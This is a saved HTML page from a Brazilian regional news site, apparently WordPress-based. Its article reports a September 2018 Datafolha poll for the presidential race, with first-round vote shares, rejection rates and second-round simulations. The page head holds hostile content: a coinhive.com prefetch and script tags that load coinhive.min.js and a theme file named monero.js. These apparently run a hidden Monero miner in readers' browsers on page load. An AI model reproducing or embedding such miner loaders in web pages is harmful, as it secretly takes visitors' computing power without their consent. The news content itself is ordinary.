

<!DOCTYPE html>
<html class="no-js" lang="pt-BR" prefix="og: http://ogp.me/ns#">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://oiguassu.com/xmlrpc.php" />
<title>PESQUISA DATAFOLHA PARA PRESIDENTE: BOLSONARO, 28%; HADDAD, 22%; CIRO, 11%; ALCKMIN, 10%; MARINA, 5% - Oiguassu</title>

	<!-- Meta Tag Manager -->
	<meta name="google-site-verification" content="9D5X4zGUYK9T8sBJcfFZt-zekBWN3kbyAXq7V-YRTEQ" />
	<!-- / Meta Tag Manager -->

<!-- This site is optimized with the Yoast SEO plugin v7.9 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://oiguassu.com/pesquisa-datafolha-para-presidente-bolsonaro-28-haddad-22-ciro-11-alckmin-10-marina-5/" />
<meta property="og:locale" content="pt_BR" />
<meta property="og:type" content="article" />
<meta property="og:title" content="PESQUISA DATAFOLHA PARA PRESIDENTE: BOLSONARO, 28%; HADDAD, 22%; CIRO, 11%; ALCKMIN, 10%; MARINA, 5% - Oiguassu" />
<meta property="og:description" content="João Amoêdo (Novo) tem 3%; Henrique Meirelles (MDB) e Alvaro Dias (Podemos) têm 2% cada um; Cabo Daciolo (Patriota), Vera (PSTU) e Guilherme Boulos (PSOL),..." />
<meta property="og:url" content="http://oiguassu.com/pesquisa-datafolha-para-presidente-bolsonaro-28-haddad-22-ciro-11-alckmin-10-marina-5/" />
<meta property="og:site_name" content="Oiguassu" />
<meta property="article:tag" content="manchete1" />
<meta property="article:section" content="Brasil" />
<meta property="article:published_time" content="2018-09-29T08:40:39+00:00" />
<meta property="og:image" content="http://oiguassu.com/wp-content/uploads/2018/09/Captura-de-Tela-2018-09-21-às-21.27.12-868x644.png" />
<meta property="og:image:width" content="868" />
<meta property="og:image:height" content="644" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:description" content="João Amoêdo (Novo) tem 3%; Henrique Meirelles (MDB) e Alvaro Dias (Podemos) têm 2% cada um; Cabo Daciolo (Patriota), Vera (PSTU) e Guilherme Boulos (PSOL),..." />
<meta name="twitter:title" content="PESQUISA DATAFOLHA PARA PRESIDENTE: BOLSONARO, 28%; HADDAD, 22%; CIRO, 11%; ALCKMIN, 10%; MARINA, 5% - Oiguassu" />
<meta name="twitter:image" content="http://oiguassu.com/wp-content/uploads/2018/09/Captura-de-Tela-2018-09-21-às-21.27.12-868x644.png" />
<script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"Organization","url":"http:\/\/oiguassu.com\/","sameAs":[],"@id":"http:\/\/oiguassu.com\/#organization","name":"Oiguassu","logo":""}</script>
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//secure.gravatar.com' />
<link rel='dns-prefetch' href='//coinhive.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para Oiguassu &raquo;" href="http://oiguassu.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Oiguassu &raquo;" href="http://oiguassu.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Oiguassu &raquo; PESQUISA DATAFOLHA PARA PRESIDENTE: BOLSONARO, 28%; HADDAD, 22%; CIRO, 11%; ALCKMIN, 10%; MARINA, 5%" href="http://oiguassu.com/pesquisa-datafolha-para-presidente-bolsonaro-28-haddad-22-ciro-11-alckmin-10-marina-5/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/oiguassu.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.8"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='dashicons-css'  href='http://oiguassu.com/wp-includes/css/dashicons.min.css?ver=4.9.8' type='text/css' media='all' />
<link rel='stylesheet' id='mh-style-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/style.css?ver=1.3.0' type='text/css' media='all' />
<link rel='stylesheet' id='mh-font-awesome-css'  href='http://oiguassu.com/wp-content/themes/mh_newsdesk/includes/font-awesome.min.css' type='text/css' media='all' />
<link rel='stylesheet' id='mh-google-fonts-css'  href='https://fonts.googleapis.com/css?family=PT+Serif:300,400,400italic,600,700%7cOswald:300,400,400italic,600,700' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack-widget-social-icons-styles-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/modules/widgets/social-icons/social-icons.css?ver=20170506' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://oiguassu.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.3.2' type='text/css' media='all' />
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var related_posts_js_options = {"post_heading":"h4"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/related-posts/related-posts.min.js?ver=20150408'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/scripts.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://coinhive.com/lib/coinhive.min.js?ver=4.9.8'></script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/themes/mh_newsdesk/js/monero.js?ver=4.9.8'></script>
<link rel='https://api.w.org/' href='http://oiguassu.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://oiguassu.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://oiguassu.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.8" />
<link rel='shortlink' href='https://wp.me/pS5BS-2Qi' />
<link rel="alternate" type="application/json+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fpesquisa-datafolha-para-presidente-bolsonaro-28-haddad-22-ciro-11-alckmin-10-marina-5%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://oiguassu.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Foiguassu.com%2Fpesquisa-datafolha-para-presidente-bolsonaro-28-haddad-22-ciro-11-alckmin-10-marina-5%2F&#038;format=xml" />
		<a href="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></a>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9260427313362027",
    enable_page_level_ads: true
  });
</script>

<link rel='dns-prefetch' href='//v0.wordpress.com'/>
<style type='text/css'>img#wpstats{display:none}</style>	<style type="text/css">
    	    		.social-nav a:hover, .logo-title, .entry-content a, a:hover, .entry-meta .entry-meta-author, .entry-meta a, .comment-info, blockquote, .pagination a:hover .pagelink { color: #019100; }
			.main-nav li:hover, .slicknav_menu, .ticker-title, .breadcrumb a, .breadcrumb .bc-text, .button span, .widget-title span, input[type=submit], table th, .comment-section-title .comment-count, #cancel-comment-reply-link:hover, .pagination .current, .pagination .pagelink { background: #019100; }
			blockquote, input[type=text]:hover, input[type=email]:hover, input[type=tel]:hover, input[type=url]:hover, textarea:hover { border-color: #019100; }
    	    	    				.main-nav, .main-nav ul li:hover > ul, .mh-footer { background: #019100; }
    	    	    	    		</style>
    <!--[if lt IE 9]>
<script src="http://oiguassu.com/wp-content/themes/mh_newsdesk/js/css3-mediaqueries.js"></script>
<![endif]-->
<link rel="amphtml" href="http://oiguassu.com/pesquisa-datafolha-para-presidente-bolsonaro-28-haddad-22-ciro-11-alckmin-10-marina-5/amp/"><link rel="icon" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-32x32.png" sizes="32x32" />
<link rel="icon" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-180x180.png" />
<meta name="msapplication-TileImage" content="http://oiguassu.com/wp-content/uploads/2018/05/cropped-Untitled-1-270x270.png" />
</head>
<body class="post-template-default single single-post postid-10930 single-format-standard mh-right-sb">
<div id="mh-wrapper">
<header class="mh-header">
	<div class="header-wrap clearfix">
				<div class="mh-col mh-1-3 header-logo-full">
			<a href="http://oiguassu.com/" title="Oiguassu" rel="home">
<div class="logo-wrap" role="banner">
<img src="http://oiguassu.com/wp-content/uploads/2018/05/cropped-b632f59c-2a6b-406a-bb6b-bd0031fe147b.jpg" height="427" width="1280" alt="Oiguassu" />
</div>
</a>
		</div>
			</div>
	<div class="header-menu clearfix">
		<nav class="main-nav clearfix">
			<div class="menu-menu-container"><ul id="menu-menu" class="menu"><li id="menu-item-90" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-90"><a href="http://oiguassu.com">Início</a></li>
<li id="menu-item-91" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-91"><a href="http://oiguassu.com/category/foz/">Foz do Iguaçu</a></li>
<li id="menu-item-92" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-92"><a href="http://oiguassu.com/category/parana/">Paraná</a></li>
<li id="menu-item-93" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-93"><a href="http://oiguassu.com/category/brasil/">Brasil</a></li>
<li id="menu-item-94" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-94"><a href="http://oiguassu.com/category/argentina/">Argentina</a></li>
<li id="menu-item-95" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-95"><a href="http://oiguassu.com/category/paraguay/">Paraguay</a></li>
<li id="menu-item-96" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-96"><a href="http://oiguassu.com/category/latinoamerica/">Latinoamerica</a></li>
<li id="menu-item-97" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-97"><a href="http://oiguassu.com/category/colunas/">Colunas</a></li>
</ul></div>		</nav>
		<div class="header-sub clearfix">
							<div id="ticker" class="news-ticker mh-col mh-2-3 clearfix">
			<span class="ticker-title">
			Hot Topics		</span>
		<ul class="ticker-content">			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/crisis-en-nicaragua-las-razones-del-gobierno-de-daniel-ortega-para-ilegalizar-las-protestas-en-el-pais-y-la-reaccion-de-sus-criticos/" title="CRISIS EN NICARAGUA: LAS RAZONES DEL GOBIERNO DE DANIEL ORTEGA PARA ILEGALIZAR LAS PROTESTAS EN EL PAÍS (Y LA REACCIÓN DE SUS CRÍTICOS)">
					<span class="ticker-item-date">setembro 30, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">CRISIS EN NICARAGUA: LAS RAZONES DEL GOBIERNO DE DANIEL ORTEGA PARA ILEGALIZAR LAS PROTESTAS EN EL PAÍS (Y LA REACCIÓN DE SUS CRÍTICOS)</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/presidente-do-stf-fara-de-gilmar-mendes-sobre-caso-beto-richa/" title="PRESIDENTE DO STF FARÁ DE GILMAR MENDES SOBRE CASO BETO RICHA">
					<span class="ticker-item-date">setembro 30, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">PRESIDENTE DO STF FARÁ DE GILMAR MENDES SOBRE CASO BETO RICHA</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/nunca-imaginei-que-isso-poderia-acontecer-diz-mae-de-atirador-de-15-anos/" title="&#8220;NUNCA IMAGINEI QUE ISSO PODERIA ACONTECER&#8221;, DIZ MÃE DE ATIRADOR DE 15 ANOS">
					<span class="ticker-item-date">setembro 30, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">&#8220;NUNCA IMAGINEI QUE ISSO PODERIA ACONTECER&#8221;, DIZ MÃE DE ATIRADOR DE 15 ANOS</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/lancada-licitacao-para-obras-de-galerias-do-distrito-empresarial-e-industrial/" title="LANÇADA LICITAÇÃO PARA OBRAS DE GALERIAS DO DISTRITO EMPRESARIAL E INDUSTRIAL">
					<span class="ticker-item-date">setembro 30, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">LANÇADA LICITAÇÃO PARA OBRAS DE GALERIAS DO DISTRITO EMPRESARIAL E INDUSTRIAL</span>
				</a>
			</li>			<li class="ticker-item">
				<a class="ticker-item-link" href="http://oiguassu.com/semana-academicas-dos-cursos-de-graduacao-movimentam-unila-nos-proximos-meses/" title="SEMANA ACADÊMICAS DOS CURSOS DE GRADUAÇÃO MOVIMENTAM UNILA NOS PRÓXIMOS MESES">
					<span class="ticker-item-date">setembro 30, 2018</span>
					<span class="ticker-item-separator">|</span>
					<span class="ticker-item-title">SEMANA ACADÊMICAS DOS CURSOS DE GRADUAÇÃO MOVIMENTAM UNILA NOS PRÓXIMOS MESES</span>
				</a>
			</li>	</ul>
</div>						<aside class="mh-col mh-1-3 header-search">
				<form role="search" method="get" class="search-form" action="http://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form>			</aside>
		</div>
	</div>
</header><div class="mh-section mh-group">
	<div id="main-content" class="mh-content"><nav class="breadcrumb"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com" itemprop="url" class="bc-home"><span itemprop="title">Home</span></a></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://oiguassu.com/category/brasil/" itemprop="url"><span itemprop="title">Brasil</span></a></span></nav>
<article id="post-10930" class="post-10930 post type-post status-publish format-standard has-post-thumbnail hentry category-brasil tag-manchete1">
	<header class="entry-header clearfix">
		<h1 class="entry-title">
			PESQUISA DATAFOLHA PARA PRESIDENTE: BOLSONARO, 28%; HADDAD, 22%; CIRO, 11%; ALCKMIN, 10%; MARINA, 5%		</h1>
		<div class="entry-tags clearfix"><span>TOPICS:</span><a href="http://oiguassu.com/tag/manchete1/" rel="tag">manchete1</a></div>	</header>
	
<div class="entry-thumbnail">
<img width="777" height="437" src="http://oiguassu.com/wp-content/uploads/2018/09/Captura-de-Tela-2018-09-21-às-21.27.12-868x644-777x437.png" class="attachment-content-single size-content-single wp-post-image" alt="" srcset="http://oiguassu.com/wp-content/uploads/2018/09/Captura-de-Tela-2018-09-21-às-21.27.12-868x644-777x437.png 777w, http://oiguassu.com/wp-content/uploads/2018/09/Captura-de-Tela-2018-09-21-às-21.27.12-868x644-180x101.png 180w, http://oiguassu.com/wp-content/uploads/2018/09/Captura-de-Tela-2018-09-21-às-21.27.12-868x644-260x146.png 260w, http://oiguassu.com/wp-content/uploads/2018/09/Captura-de-Tela-2018-09-21-às-21.27.12-868x644-373x210.png 373w, http://oiguassu.com/wp-content/uploads/2018/09/Captura-de-Tela-2018-09-21-às-21.27.12-868x644-120x67.png 120w" sizes="(max-width: 777px) 100vw, 777px" data-attachment-id="10729" data-permalink="http://oiguassu.com/datapoder360-bolsonaro-tem-26-e-haddad-22-os-dois-empatam-no-2o-turno/captura-de-tela-2018-09-21-as-21-27-12-868x644/" data-orig-file="http://oiguassu.com/wp-content/uploads/2018/09/Captura-de-Tela-2018-09-21-às-21.27.12-868x644.png" data-orig-size="868,644" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Captura-de-Tela-2018-09-21-às-21.27.12-868&#215;644" data-image-description="" data-medium-file="http://oiguassu.com/wp-content/uploads/2018/09/Captura-de-Tela-2018-09-21-às-21.27.12-868x644-300x223.png" data-large-file="http://oiguassu.com/wp-content/uploads/2018/09/Captura-de-Tela-2018-09-21-às-21.27.12-868x644.png" /></div>
		<p class="entry-meta">
<span class="entry-meta-author vcard author">Posted By: <a class="fn" href="http://oiguassu.com/author/administrador/">Administrador</a></span>
<span class="entry-meta-date updated">setembro 29, 2018</span>
</p>
	<div class="entry-content clearfix">
		<h2 style="text-align: justify;">João Amoêdo (Novo) tem 3%; Henrique Meirelles (MDB) e Alvaro Dias (Podemos) têm 2% cada um; Cabo Daciolo (Patriota), Vera (PSTU) e Guilherme Boulos (PSOL), 1% cada; João Goulart Filho (PPL) e Eymael (DC) não pontuaram</h2>
<p style="text-align: justify;">O Datafolha divulgou nesta sexta-feira (28) o resultado da mais recente pesquisa de intenção de voto na eleição presidencial. A pesquisa ouviu 9 mil eleitores entre quarta-feira (26) e sexta-feira (28).</p>
<p style="text-align: justify;">O nível de confiança da pesquisa é de 95%. Isso quer dizer que há uma probabilidade de 95% de os resultados retratarem a realidade, considerando a margem de erro, que é de 2 pontos, para mais ou para menos.</p>
<p style="text-align: justify;">Os resultados foram os seguintes:</p>
<p style="text-align: justify;">&#8211; Jair Bolsonaro (PSL): 28%<br />
&#8211; Fernando Haddad (PT): 22%<br />
&#8211; Ciro Gomes (PDT): 11%<br />
&#8211; Geraldo Alckmin (PSDB): 10%<br />
&#8211; Marina Silva (Rede): 5%<br />
&#8211; João Amoêdo (Novo): 3%<br />
&#8211; Henrique Meirelles (MDB): 2%<br />
&#8211; Alvaro Dias (Podemos): 2%<br />
&#8211; Cabo Daciolo (Patriota): 1%<br />
&#8211; Vera Lúcia (PSTU): 1%<br />
&#8211; Guilherme Boulos (PSOL): 1%<br />
&#8211; João Goulart Filho (PPL): 0%<br />
&#8211; Eymael (DC): 0%<br />
&#8211; Branco/nulos: 10%<br />
&#8211; Não sabe/não respondeu: 5%</p>
<p><img class="aligncenter " src="https://s2.glbimg.com/BMp1JfiLybasanvHnVZSjENz968=/0x0:1600x3370/1000x0/smart/filters:strip_icc()/i.s3.glbimg.com/v1/AUTH_59edd422c0c84a879bd37670ae4f538a/internal_photos/bs/2018/Y/2/SaV8ZHTBADoeYyMK1AXw/datafolha-2809-intencao-voto.png" width="778" height="1639" /></p>
<h6>Pesquisa Datafolha &#8211; Evolução da intenção de voto para presidente. — Foto: Arte/G1</h6>
<p style="text-align: justify;"><strong>Em relação ao levantamento anterior do instituto , divulgado na quinta-feira (20):</strong></p>
<p style="text-align: justify;">Bolsonaro ficou estável com 28%;</p>
<p style="text-align: justify;">Haddad subiu de 16% para 22%;</p>
<p style="text-align: justify;">Ciro passou de 13% para 11%;</p>
<p style="text-align: justify;">Alckmin oscilou de 9% para 10%;</p>
<p style="text-align: justify;">Ciro Gomes e Alckmin estão tecnicamente empatados.</p>
<p style="text-align: justify;">Marina passou de 7% para 5%;</p>
<p style="text-align: justify;">Os indecisos se mantiveram em 5% e os brancos ou nulos, de 12% para 10%.</p>
<h2 style="text-align: justify;">Rejeição</h2>
<p style="text-align: justify;">O Instituto também perguntou: &#8220;Em quais desses nomes ___________ você não votaria de jeito nenhum no primeiro turno da eleição para presidente deste ano? E qual mais? &#8220;.</p>
<p style="text-align: justify;">Neste levantamento, portanto, os entrevistados podem citar mais de um candidato. Por isso, os resultados somam mais de 100%.</p>
<p style="text-align: justify;">Os resultados foram:</p>
<p style="text-align: justify;">&#8211; Bolsonaro: 46%<br />
&#8211; Haddad: 32%<br />
&#8211; Marina: 28%<br />
&#8211; Alckmin: 24%<br />
&#8211; Ciro: 21%<br />
&#8211; Vera: 18%<br />
&#8211; Cabo Daciolo: 17%<br />
&#8211; Eymael: 17%<br />
&#8211; Boulos: 17%<br />
&#8211; Meirelles: 16%<br />
&#8211; Alvaro Dias: 15%<br />
&#8211; Amoêdo: 14%<br />
&#8211; João Goulart Filho: 14%<br />
&#8211; Rejeita todos: 4%<br />
&#8211; Votaria em qualquer um: 2%<br />
&#8211; Não sabe/não respondeu: 4%</p>
<p><img class="aligncenter " src="https://s2.glbimg.com/S8UjiBnpwS5GapAZGbK_6icBS0M=/0x0:1600x3660/1000x0/smart/filters:strip_icc()/i.s3.glbimg.com/v1/AUTH_59edd422c0c84a879bd37670ae4f538a/internal_photos/bs/2018/w/Z/RQJk2UQ0GmYTmJhBo6Vg/datafolha-2809-rejeicao.png" width="759" height="1737" /></p>
<h6>Pesquisa Datafolha &#8211; Evolução da taxa de rejeição na intenção de voto para presidente. — Foto: Arte/G1</h6>
<h2 style="text-align: justify;">Simulações de segundo turno</h2>
<p style="text-align: justify;">Ciro 42% x 36% Alckmin (branco/nulo: 19%; não sabe: 3%)</p>
<h6><img class="aligncenter " src="https://s2.glbimg.com/HKY6LmLBC6arcI0D4hphIpZjg7w=/0x0:650x776/1000x0/smart/filters:strip_icc()/i.s3.glbimg.com/v1/AUTH_59edd422c0c84a879bd37670ae4f538a/internal_photos/bs/2018/3/n/63W5D9R9uRaN9vFOGYDA/datafolha-2809-2turno-ciro-alckmin.png" width="652" height="778" /></h6>
<h6>Pesquisa Datafolha &#8211; Simulação de segundo turno entre Ciro x Alckmin — Foto: Arte/G1</h6>
<p style="text-align: justify;">Alckmin 45% x 38% Bolsonaro (branco/nulo: 16%; não sabe: 2%)</p>
<p><img class="aligncenter " src="https://s2.glbimg.com/HQc--IDl3KGWpi-NbeQiivjJw00=/0x0:1600x1910/1000x0/smart/filters:strip_icc()/i.s3.glbimg.com/v1/AUTH_59edd422c0c84a879bd37670ae4f538a/internal_photos/bs/2018/T/M/LaHviPQ1u6PZqAfYuk9g/datafolha-2809-2turno-alckmin-bolsonaro.png" width="682" height="814" /></p>
<h6>Pesquisa Datafolha &#8211; Simulação de segundo turno entre Alckmin x Bolsonaro — Foto: Arte/G1</h6>
<p style="text-align: justify;">Ciro 48% x 38% Bolsonaro (branco/nulo: 12%; não sabe: 2%)</p>
<p><img class="aligncenter " src="https://s2.glbimg.com/SuIt3h-fxILT0Z8y-wiNVuNiIFQ=/0x0:1600x1910/1000x0/smart/filters:strip_icc()/i.s3.glbimg.com/v1/AUTH_59edd422c0c84a879bd37670ae4f538a/internal_photos/bs/2018/x/X/3GULw0RHOcfxblcSvHwg/datafolha-2809-2turno-ciro-bolsonaro.png" width="718" height="857" /></p>
<h6>Pesquisa Datafolha &#8211; Simulação de segundo turno entre Ciro x Bolsonaro — Foto: Arte/G1</h6>
<p style="text-align: justify;">Alckmin 39% x 39% Haddad (branco/nulo: 19%; não sabe: 3%)</p>
<p><img class="aligncenter" src="https://s2.glbimg.com/PmjmiHqn1aofY1Piahp9OYymP3U=/0x0:650x776/1000x0/smart/filters:strip_icc()/i.s3.glbimg.com/v1/AUTH_59edd422c0c84a879bd37670ae4f538a/internal_photos/bs/2018/0/n/SEkxiRR6qtfsIMglr2BQ/datafolha-2809-2turno-alckmin-haddad.png" width="756" height="903" /></p>
<h6>Pesquisa Datafolha &#8211; Simulação de segundo turno entre Alckmin x Haddad — Foto: Arte/G1</h6>
<p style="text-align: justify;">Haddad 45% x 39% Bolsonaro (branco/nulo: 13%; não sabe: 2%)</p>
<p><img class="aligncenter " src="https://s2.glbimg.com/TQDm5VkdVZnVryA1UZtmEMfH3Xc=/0x0:1600x1910/1000x0/smart/filters:strip_icc()/i.s3.glbimg.com/v1/AUTH_59edd422c0c84a879bd37670ae4f538a/internal_photos/bs/2018/9/N/WUNcKETkOv2yOCyOJ2CA/datafolha-2809-2turno-haddad-bolsonaro.png" width="744" height="888" /></p>
<h6>Pesquisa Datafolha &#8211; Simulação de segundo turno entre Haddad x Bolsonaro — Foto: Arte/G1</h6>
<p style="text-align: justify;">Ciro 41% x 35% Haddad (branco/nulo: 21%; não sabe: 3%)</p>
<p><img class="aligncenter " src="https://s2.glbimg.com/XGVQGp7N3pG0sdhdPEMa5vPyC6k=/0x0:1600x1910/1000x0/smart/filters:strip_icc()/i.s3.glbimg.com/v1/AUTH_59edd422c0c84a879bd37670ae4f538a/internal_photos/bs/2018/A/r/mvLu8xQsCgCiNXGXdGPA/datafolha-2809-2turno-ciro-haddad.png" width="716" height="856" /></p>
<h6>Pesquisa Datafolha &#8211; Simulação de segundo turno entre Ciro x Alckmin — Foto: Arte/G1</h6>
<h2 style="text-align: justify;">Sobre a pesquisa</h2>
<p style="text-align: justify;"><strong>Margem de erro:</strong> 2 pontos percentuais para mais ou para menos<br />
<strong>Entrevistados:</strong> 9 mil eleitores em 343 municípios<br />
<strong>Quando a pesquisa foi feita:</strong> 26, 27 e 28 de setembro<br />
<strong>Registro no TSE:</strong> BR-08687/2018<br />
<strong>Nível de confiança:</strong> 95%<br />
<strong>Contratantes da pesquisa:</strong> TV Globo e &#8220;Folha de S.Paulo&#8221;</p>
<h6 style="text-align: right;">(Com G1)</h6>
<p><img class="aligncenter size-large" src="http://unifoz.edu.br/ProdutosIMG/5_1.jpg" width="800" height="756" /></p>
<div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-10930" class="share-twitter sd-button share-icon no-text" href="http://oiguassu.com/pesquisa-datafolha-para-presidente-bolsonaro-28-haddad-22-ciro-11-alckmin-10-marina-5/?share=twitter" rel="noopener noreferrer" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-10930" class="share-facebook sd-button share-icon no-text" href="http://oiguassu.com/pesquisa-datafolha-para-presidente-bolsonaro-28-haddad-22-ciro-11-alckmin-10-marina-5/?share=facebook" rel="noopener noreferrer" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-google-plus-1"><a rel="nofollow" data-shared="sharing-google-10930" class="share-google-plus-1 sd-button share-icon no-text" href="http://oiguassu.com/pesquisa-datafolha-para-presidente-bolsonaro-28-haddad-22-ciro-11-alckmin-10-marina-5/?share=google-plus-1" rel="noopener noreferrer" target="_blank" title="Compartilhe no Google+"><span></span><span class="sharing-screen-reader-text">Compartilhe no Google+(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article>		<h4 class="widget-title related-content-title">
			<span>Related Articles</span>
		</h4>
		<div class="related-content clearfix"><article class="mh-col mh-1-4 content-grid post-3986 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized tag-manchete1">
	<div class="content-thumb content-grid-thumb">
